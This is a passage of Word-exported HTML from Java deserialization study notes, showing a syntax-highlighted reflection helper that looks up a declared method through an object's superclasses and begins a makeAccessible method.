italic;font-family: Cambria;">获取对象的</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> DeclaredMethod</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;"><span style="mso-spacerun:yes;">     </span>* @</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param methodName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param parameterTypes</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*/</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">static</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Method</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredMethod</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> methodName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> parameterTypes</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">for</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> superClass </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getClass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> superClass </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">!=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> superClass </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> superClass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getSuperclass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">())</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> superClass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredMethod</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">methodName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> parameterTypes</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">NoSuchMethodException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//Method 不在当前类定义, 继续向上转型</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/**</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">使</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> filed </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">变为可访问</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;"><span style="mso-spacerun:yes;">     </span>* @</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*/</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">static</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">void</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">makeAccessible</span></span></span><span 